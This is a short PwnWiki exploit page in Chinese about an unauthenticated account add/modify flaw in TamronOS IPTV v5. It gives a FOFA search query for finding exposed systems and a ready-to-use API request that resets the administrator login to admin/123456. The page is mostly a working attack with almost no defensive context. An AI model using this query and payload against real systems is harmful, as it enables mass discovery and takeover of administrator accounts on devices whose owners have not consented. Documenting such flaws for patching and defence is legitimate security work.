TamronOS IPTV系统任意用户添加修改漏洞

From PwnWiki
This page is a translated version of the page TamronOS IPTV系統任意用戶添加修改漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎

漏洞影响

TamronOS IPTV v5 3..6.6

FOFA

title="TamronOS IPTV系统"

Payload

重置用户名和密码为admin/123456

/api/manager/submit?group=1&password=123456&rnd=0.27576036347932775&status=1&username=admin